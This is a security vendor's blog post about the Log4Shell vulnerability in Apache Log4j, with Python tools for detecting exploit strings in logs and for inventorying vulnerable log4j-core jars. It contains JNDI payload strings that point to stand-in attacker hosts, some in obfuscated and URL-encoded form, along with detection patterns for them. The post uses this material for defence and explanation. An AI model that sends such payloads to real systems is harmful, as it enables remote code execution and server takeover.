Log4Shell hits big players with critical 0-day exploit
[Last updated Dec. 19, 2021]
A recently discovered vulnerability (Log4Shell, CVE-2021-44228) in Apache Log4j, a widely used Java logging library, allows unauthenticated remote code execution (RCE) and full server takeover, and is being exploited in the wild. Because the library is embedded in so much software, affecting companies such as Amazon, Apple, Cisco, Steam, Tesla, Twitter, and many more, the issue is of global scale. A patch is already available and other mitigations are being made accessible.
Find CYREBRO’s latest mitigation steps:
Log4j 2.15.0 vulnerability – Initial vulnerability
Log4j 2.16.0 vulnerability – DoS vulnerability
Log4j 2.17.0 vulnerability – RCE vulnerability
What happened?
A vulnerability, with exploitation attempts observed as early as December 1 and first seen being abused against Minecraft, has been found in Log4j, a Java logging library maintained by Apache. Log4j's message lookup feature expands ${...} expressions inside logged strings, including JNDI lookups that fetch data from a remote server; an attacker who can get a crafted string into any logged field (a username, a User-Agent header, a chat message) can make the server load and execute a class from an attacker-controlled host, with no authentication required. CVE-2021-44228 affects Log4j 2.0-beta9 through 2.14.1; the follow-on issues found after the first fix affect releases up to and including 2.17.0. The original bug carries the maximum CVSS score of 10.0.
How did it happen?
The first widely shared abuse was on Minecraft servers, where a player could paste a lookup string such as ${jndi:ldap://attacker.com/a} into the chat; the server (or any client that logs the chat) would resolve the JNDI reference against the attacker's LDAP server, load the Java class it pointed to, and hand the attacker control of the process. Because exploitation needs nothing more than getting that string logged, attackers were quick to take advantage of it once the vulnerability went public on Dec. 9.
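As an added illustration (not part of the original post and not CYREBRO's tooling), the following Python flags the lookup string described above in log lines. Attackers quickly moved from the plain ${jndi:ldap://...} form to nested no-op lookups (${${lower:j}ndi:...}, ${::-j}) and URL-encoded variants, so the detector first undoes the encoding and collapses nested lookups inside-out before matching. The host attacker.example and the sample log lines are constructed for the example.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Innermost ${...} lookup: its body contains no further "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with a remote protocol handler, once obfuscation is undone.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
                   re.IGNORECASE)


def _resolve_one(body: str) -> Optional[str]:
    """Evaluate one innermost lookup the way Log4j's substitutor does for the
    lookups attackers use as no-ops. Returns None for anything else (including
    the jndi lookup itself) so that it is left in place."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default} yields the default when key is undefined; attackers
        # write ${::-j} or ${env:NOPE:-j} just to emit the letter "j".
        return body.split(":-", 1)[1]
    return None


def _collapse_once(s: str):
    """Replace every innermost resolvable lookup; report whether anything changed."""
    out, pos, changed = [], 0, False
    for m in _INNERMOST.finditer(s):
        out.append(s[pos:m.start()])
        r = _resolve_one(m.group(1))
        out.append(m.group(0) if r is None else r)
        changed = changed or r is not None
        pos = m.end()
    out.append(s[pos:])
    return "".join(out), changed


def normalize(line: str, max_rounds: int = 50) -> str:
    """URL-decode (at most twice, for double encoding) and resolve nested
    no-op lookups inside-out until nothing changes."""
    s = line
    for _ in range(2):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        s, changed = _collapse_once(s)
        if not changed:
            break
    return s


def analyze(line: str) -> dict:
    norm = normalize(line)
    m = _JNDI.search(norm)
    return {
        "malicious": m is not None,
        "protocol": m.group(1).lower() if m else None,
        "normalized": norm,
        "was_obfuscated": m is not None and norm != line,
    }


def scan(lines: List[str]) -> List[dict]:
    """Return the analysis of every line that carries a JNDI lookup."""
    return [a for a in (analyze(l) for l in lines) if a["malicious"]]


# Constructed sample lines (not real traffic): three exploitation attempts in
# Apache access-log format, one normal request, and an application log line
# with a harmless default-value lookup that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    'Dec 10 12:00:05 app INFO price=${env:PRICE:-10} currency=USD',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["protocol"], "obfuscated" if hit["was_obfuscated"] else "plain", hit["normalized"])
```

Matching on the normalized form rather than on the literal substring jndi: is what keeps the second and third sample lines from slipping past; the last line shows that a default-value lookup on its own is not evidence of an attack.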
What are the effects?
Researchers have reported the vulnerability being used to install cryptomining malware, recruit servers into botnets, launch denial-of-service attacks, and exfiltrate sensitive data from vulnerable servers. The vulnerability affects services around the globe, including Apple, Tencent, Steam, Twitter, Baidu, DIDI, JD, NetEase, CloudFlare, Amazon, Tesla, Google, Webex, LinkedIn and more. The risk it poses demands fast and serious attention from every affected organization to minimize potential damage, and the remainder of December will be a cleanup effort for already overworked IT teams heading into a new year. Much is still unknown, more is being learned daily, and many companies have yet to release a statement addressing the issue.
What is being done about it?
For starters, Apache's guidance is to upgrade Log4j to 2.17.1 (2.12.4 on Java 7 and 2.3.2 on Java 6). The fixes arrived in steps: CVE-2021-44228 was fixed in 2.15.0; that fix was found incomplete in certain non-default configurations, tracked as CVE-2021-45046 and fixed in 2.16.0; 2.17.0 fixed a denial of service through infinite lookup recursion (CVE-2021-45105); and 2.17.1 fixed CVE-2021-44832, a remote code execution reachable by an attacker who can modify the logging configuration. Organizations should therefore inventory every copy of log4j-core in their environment, including copies bundled inside application archives and vendor products, rather than assume one upgrade closes the issue. The workaround initially circulated, setting the log4j2.formatMsgNoLookups system property to true, is not sufficient on its own: it does not cover the configurations affected by CVE-2021-45046. Where an upgrade is not yet possible, Apache's stop-gap is to remove the JndiLookup class from the log4j-core jar, which closes the JNDI lookups but not the later, non-JNDI issues.
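The following Python, added here as an example and not CYREBRO's or Apache's tooling, does the inventory step described above: it walks a directory for log4j-core jars (including jars bundled inside war/ear files), reads the version from the jar's Maven pom.properties, maps it to the fixed-in versions listed above, and checks whether JndiLookup.class has been removed. It models only the 2.x mainline (the 2.3.x and 2.12.x backport releases are not handled) and, to run stand-alone, builds a few constructed jars carrying only the two entries it inspects in a temporary directory.

```python
import io
import os
import tempfile
import zipfile
from typing import Iterator, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")

# Fixed-in versions on the 2.x mainline; 2.3.x / 2.12.x backports are not modelled.
FIXES = [
    ((2, 15, 0), "CVE-2021-44228"),
    ((2, 16, 0), "CVE-2021-45046"),
    ((2, 17, 0), "CVE-2021-45105"),
    ((2, 17, 1), "CVE-2021-44832"),
]
JNDI_CVES = {"CVE-2021-44228", "CVE-2021-45046"}


def parse_version(v: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0)."""
    parts = [int(p) for p in v.split("-", 1)[0].split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def version_from_jar(zf: zipfile.ZipFile) -> Optional[str]:
    if POM_PROPERTIES not in zf.namelist():
        return None  # not a log4j-core artifact
    for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def assess(version: str, has_jndi_lookup: bool) -> dict:
    v = parse_version(version)
    unpatched = [cve for fixed_in, cve in FIXES if v < fixed_in]
    # Deleting JndiLookup.class (Apache's stop-gap) closes the JNDI CVEs only;
    # the recursion DoS and the JDBC-appender RCE still need the upgrade.
    mitigated = [] if has_jndi_lookup else [c for c in unpatched if c in JNDI_CVES]
    return {
        "version": version,
        "unpatched": [c for c in unpatched if c not in mitigated],
        "mitigated_by_class_removal": mitigated,
    }


def _walk_archive(label: str, zf: zipfile.ZipFile) -> Iterator[Tuple[str, zipfile.ZipFile]]:
    yield label, zf
    for name in zf.namelist():  # recurse into archives bundled inside this one
        if name.endswith(ARCHIVE_EXT):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                yield from _walk_archive(label + "!" + name, inner)


def scan(root: str) -> List[dict]:
    """Report every log4j-core found under root, with paths relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if not f.endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, f)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with zipfile.ZipFile(path) as zf:
                for label, inner in _walk_archive(rel, zf):
                    version = version_from_jar(inner)
                    if version is None:
                        continue
                    result = assess(version, JNDI_LOOKUP_CLASS in inner.namelist())
                    result["path"] = label
                    findings.append(result)
    return findings


# Constructed demo data: fake jars carrying only the two entries the scanner inspects.
def _fake_jar(dest, version: str, include_jndi_lookup: bool = True) -> None:
    with zipfile.ZipFile(dest, "w") as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                    "artifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")  # placeholder entry, not a real class


def demo() -> dict:
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    _fake_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
    _fake_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "2.14.1", include_jndi_lookup=False)
    _fake_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
    nested = io.BytesIO()
    _fake_jar(nested, "2.16.0")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", nested.getvalue())
    return {f["path"]: f for f in scan(root)}


if __name__ == "__main__":
    for path, f in demo().items():
        print(path, f["version"], "unpatched:", f["unpatched"],
              "mitigated:", f["mitigated_by_class_removal"])
```

Point scan() at an application or container filesystem to get the real inventory. The stop-gap the scanner recognizes is the one Apache documented, zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class; a jar treated that way is reported as mitigated for the two JNDI CVEs and still unpatched for the later ones.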
Additionally, different software vendors and cybersecurity companies are also tackling this issue by presenting solutions of their own on how to deal with the vulnerability. This subject is being made public through national and organizational announcements and discussed widely in order to reach the many users of the tool around the world that could be affected by the vulnerability.
What measures are being taken to prevent this in the future?
The truth of the matter is that not much can be done to prevent such vulnerabilities in the future. Bugs and flaws similar to this one will always exist and continue to disrupt the IT world, so the practical defense is being able to find and fix them quickly. Quick updates and help are being offered to all affected organizations.
The smallest and simplest vulnerabilities can cause massive damage, financial loss, and IT worker fatigue. As pointed out in a recent CYREBRO report, the most common threat vector we found in 2021 is the vulnerability exploit. It is imperative for organizations to treat these incidents with full attention, because every hour an exploitable vulnerability is left unaddressed widens the window for compromise. This incident is a sharp reminder of how critical it is to keep up with patches and updates for the software the company relies on, including libraries bundled inside third-party products.
Avoiding such cases is near impossible, but responding swiftly and mitigating threats before significant damage is done is completely achievable. If your organization is consistent in IT maintenance, auditing, and updating, and keeps an inventory of the software and libraries it runs, response becomes faster and simpler, keeping the organization safer.